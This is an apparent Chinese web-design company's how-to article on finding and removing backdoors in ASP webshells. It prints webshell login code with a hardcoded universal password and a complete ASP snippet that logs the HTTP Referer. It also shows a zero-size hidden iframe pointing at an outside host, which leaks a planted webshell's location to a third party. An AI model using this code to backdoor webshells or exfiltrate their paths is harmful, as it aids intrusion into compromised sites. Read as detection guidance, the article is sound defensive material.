知识学堂
  • ·联系电话:+86.023-75585550
  • ·联系传真:+86.023-75585550
  • ·24小时手机:13896886023
  • ·QQ 咨 询:361652718 513960520
当前位置 > 首页 > 知识学堂 > 网站建设知识
asp木马上留后门的检测和原理
更新时间:2012-02-02 | 发布人:本站 | 点击率:893

 通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密asp木马解密工具

 
 
解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录
 
正常的:
 
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
 
加有万能密码的:
 
EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"
 
1111111就是传说中的万能密码了。
 
找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!
 
下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址width=0 height=0></iframe>
 
找到后删了,到此asp后门就算剔除了!
 
 
下面教大家后门的原理:
 
这是一段收信的asp代码将其保存为1.asp
 
<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close www.xxx.com
set file=nothing
set fs=nothing
%>
 
代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
 
上传到空间比如http://www.badguest.cn /1.asp
 
然后里用
 
<iframe src=http://www.badguest.cn /1.asp width=0 height=0></iframe>
 
插到asp木马中
 
那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
分享到: QQ空间 新浪微博 开心网 人人网
相关文章